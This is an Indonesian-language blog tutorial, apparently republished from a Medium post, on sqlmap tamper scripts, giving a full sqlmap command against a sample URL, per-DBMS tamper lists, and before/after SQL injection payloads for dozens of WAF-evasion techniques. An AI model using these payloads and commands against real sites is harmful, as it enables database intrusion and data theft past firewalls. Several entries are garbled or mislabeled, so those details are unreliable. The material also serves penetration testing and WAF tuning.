SQLMap Tamper Scripts (SQL Injection and WAF bypass)

Table of Contents

Hello sobat pixel pada kesempatan kali ini gue mau kasih sedikit penjelasan tentang SQLMap Tamper Scripts (SQL Injection and WAF bypass), Kalian tahu? Didalam tools sqlmap terdapat sebuah script (Tamper Script) script tersebut berbeda-beda fungsi, dan salah satu fungsi ialah Bypassing WAF (Web Application Firewall), and then buat kalian yang belum punya SQLMap mungkin kalian bisa lihat di postingan saya sebelumnya. Langsung aja yuk simak gimana cara memakai script tamper nya.

Use and load all tamper scripts to evade filters and WAF 
root@pixelscoders:$ sqlmap.py --url "http://www.pixel-code.ga/news.php?id=3 --level=5 --risk=3 --v 3 --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords

Dibawah ini mungkin bisa menjadi referensi untuk pengujian tamper script pada DBMS tertentu

General Tamper Scripts
tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes

MSSQL
tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes

MySQL
tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor

Mungkin bagi yang belum tahu penjelasannya apasih yang ada pada tamper script yuk simak kak
List of explanation Tamper Scripts SQLMap

apostrophemask
Function: Encoding quotation marks with utf8
Platform: All
Example:
1 AND ‘1’=’1 ==> 1 AND %EF%BC%871%EF%BC%87=%EF%BC%871

apostrophenullencode
Function: ‘ ==> %27
Platform: All
Example:
1 AND ‘1’=’1 ==> 1 AND %271%27=%271

appendnullbyte
Function: Space ==>
Platform: Microsoft Access
Example:
1 AND 1=1 ==> 1 AND 1=1

base64encode
Function: base64 encode
Platform: All
Example:
1' AND SLEEP(5)# ==> MScgQU5EIFNMRUVQKDUpIw==

between
Function: > ==> NOT BETWEEN 0 AND
Platform: Mssql2005、MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0
Example:
1 AND A > B — ==> 1 AND A NOT BETWEEN 0 AND B — ```、```1 AND A = B — ==> 1 AND A BETWEEN B AND B —

bluecoat
Function: Space ==> %09
Platform: MySQL 5.1, SGOS
Example:
SELECT id FROM users WHERE id = 1 ==> SELECT%09id FROM%09users WHERE%09id LIKE 1

chardoubleencode
Function: Double url encoding
Platform: All
Example:
SELECT FIELD FROM%20TABLE ==> %2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544%2520%2546%2552%254F%254D%2520%2554%2541%2542%254C%2545

charencode
Function: url encoding
Platform: Mssql 2005、MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0
Example:
SELECT FIELD FROM%20TABLE ==> %53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45

charunicodeencode
Function: escape code
Platform: Mssql 2000,2005、MySQL 5.1.56、PostgreSQL 9.0.3 ASP/ASP.NET
Example:
SELECT FIELD%20FROM TABLE ==> %u0053%u0045%u004C%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004C%u0044%u0020%u0046%u0052%u004F%u004D%u0020%u0054%u0041%u0042%u004C%u0045

commalesslimit
Function: limit 2,3 ==> LIMIT 3 OFFSET 2
Platform: MySQL 5.0 and 5.5
Example:
LIMIT 2, 3 ==> LIMIT 3 OFFSET 2

commalessmid
Function: MID(VERSION(), 1, 1) ==> MID(VERSION() FROM 1 FOR 1)
Platform: MySQL 5.0 and 5.5
Example:
MID(VERSION(), 1, 1) ==> MID(VERSION() FROM 1 FOR 1)

concat2concatws
Function: CONCAT() ==> CONCAT_WS()
Platform: MySQL 5.0
Example:
CONCAT(1,2) ==> CONCAT_WS(MID(CHAR(0),0,0),1,2)

equaltolike
Function: ＝ ==> like
Platform: Mssql 2005、MySQL 4, 5.0 and 5.5
Example:
SELECT * FROM users WHERE id=1 ==> SELECT * FROM users WHERE id LIKE 1

escapequotes
Function: ‘ ==> \‘、” ==> \“
Platform: All
Example:
1" AND SLEEP(5)# ==> 1\\\\” AND SLEEP(5)#

greatest
Function: > ==> GREATEST
Platform: MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0
Example:
1 AND A > B ==> 1 AND GREATEST(A,B+1)=A

halfversionedmorekeywords
Function: Space ==> /*!0
Platform: MySQL 4.0.18, 5.0.22
Example:
union ==> /*!0union

ifnull2ifisnull
Function: IFNULL(A, B) ==> IF(ISNULL(A), B, A)
Platform: MySQL 5.0 and 5.5
Example:
IFNULL(1, 2) ==> IF(ISNULL(1),2,1)

informationschemacomment
Function: Space ==> /**/
Platform: MySQL
Example:
SELECT table_name FROM INFORMATION_SCHEMA.TABLES ==> SELECT table_name FROM INFORMATION_SCHEMA/**/.TABLES

lowercase
Function: INSERT ==> insert
Platform: Mssql 2005、MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0
Example:
SELECT table_name FROM INFORMATION_SCHEMA.TABLES ==> select table_name from information_schema.tables

modsecurityversioned
Function: AND ==> /!12345AND/
Platform: MySQL 5.0
Example:
1 AND 2>1 — ==> 1 /*!30874AND 2>1*/ —

multiplespaces
Function: Space==> Multiple spaces
Platform: All
Example:
1 UNION SELECT foobar ==> 1 UNION SELECT foobar

nonrecursivereplacement
Function: union ==> uniunionon
Platform: All
Example:
1 UNION SELECT 2 — ==> 1 UNION SELESELECTCT 2-

overlongutf8
Function: unicode encoding
Platform: All
Example:
SELECT FIELD FROM TABLE WHERE 2>1 ==> SELECT%C0%AAFIELD%C0%AAFROM%C0%AATABLE%C0%AAWHERE%C0%AA2%C0%BE1

percentage
Function: select ==> s%e%l%e%c%t
Platform: Mssql 2000, 2005、MySQL 5.1.56, 5.5.11、PostgreSQL 9.0
Example:
SELECT FIELD FROM TABLE ==> %S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E

randomcase
Function: INSERT ==> INseRt
Platform: Mssql 2005、MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0
Example:
INSERT ==> InseRt

randomcomments
Function: INSERT ==> I/**/N/**/SERT
Platform: Mysql
Example:
INSERT ==> I / ** / N / ** / SERT

securesphere
Function: 1 AND 1=1 ==> 1 AND 1=1 and ‘0having’=’0having’
Platform: All
Example:
1 AND 1=1 ==> 1 AND 1=1 and ‘0having’=’0having’

sp_password
Function: Space ==> sp_password
Platform: Mssql
Example:
1 AND 9227=9227 — ==> 1 AND 9227=9227 — sp_password

space2comment
Function: Space ==> /**/
Platform: Mssql 2005、MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0
Example:
SELECT id FROM users ==> SELECT/**/id/**/FROM/**/users

space2dash
Function: Space==> -nVNaVoPYeva% 0A
Platform:MSSQL、SQLite
Example:
1 AND 9227=9227 ==> 1 — nVNaVoPYeva%0AAND — ngNvzqu%0A9227=9227

space2hash
Function: Space ==> %23nVNaVoPYeva%0A
Platform: MySQL 4.0, 5.0
Example:
1 AND 9227=9227 ==> 1%23nVNaVoPYeva%0AAND%23ngNvzqu%0A9227=9227

space2morehash
Function: Space ==> %23ngNvzqu%0A
Platform: MySQL 5.1.41
Example:
1 AND 9227=9227 ==> 1%23ngNvzqu%0AAND%23nVNaVoPYeva%0A%23lujYFWfv%0A9227=9227

space2mssqlblank
Function: Space ==> %0E
Platform: Mssql 2000,2005
Example:
SELECT id FROM users ==> SELECT%0Eid%0DFROM%07users

space2mssqlblank
Function: Space ==> %23%0A
Platform: Mssql、Mysql
Example:
1 AND 1=1 ==> 1%23%0AAND%23%0A9227=9227

space2mysqlblank
Function: Space ==> %2B, %0D, %0C
Platform: Mysql5.1
Example:
SELECT id FROM users ==> SELECT%0Bid%0DFROM%0Cusers

space2mysqldash
Function: Space==> –%0A
Platform: Mssql、Mysql
Example:
1 AND 9227=9227 ==> 1 — %0AAND — %0A9227=9227

space2plus
Function: Space ==> +
Platform: All
Example:
SELECT id FROM users ==> SELECT+id+FROM+users

space2randomblank
Function: Space ==> %0D, %0A, %0C, %09
Mssql 2005、MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0
Example:
SELECT id FROM users ==> SELECT%0Did%0DFROM%0Ausers

symboliclogical
Function: and ==> %26%26
Platform: All
Example:
1 AND ‘1’=’1 ==> 1 %26%26 ‘1’=’1

unionalltounion
Function: Replace All is empty
Platform: All
Example:
-1 UNION ALL SELECT ==> -1 UNION SELECT

unmagicquotes
Function: ‘ ==> %df%27
Platform: Mysql magic_quotes/addslashes
Example:
1' AND 1=1 ==> 1%bf%27 —

uppercase
Function: Lower case to upper case
Platform: Mssql 2005、MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0
Example:
insert ==> INSERT

varnish
Function: header
Example:
X-originating-IP: 127.0.0.1

versionedkeywords
Function: union ==> /!union/
Platform: MySQL 4.0.18, 5.1.56, 5.5.11
Example:
1 union select user() ==> 1/*!UNION*//*!SELECT*/user()

xforwardedfor
Function: X-Forwarded-For Random Head
Platform: All
Example:
X-Forwarded-For: 127.0.0.1

Gimana? cukup mudah dipahami dan dipraktekan bukan? Oiya prakteknya juga gunakan pada hal2 yang baik ya hehe, Oke mungkin cukup sekian, Dont forget too share and see you next time~

Source :
https://medium.com/@drag0n/sqlmap-tamper-scripts-sql-injection-and-waf-bypass-c5a3f5764cb3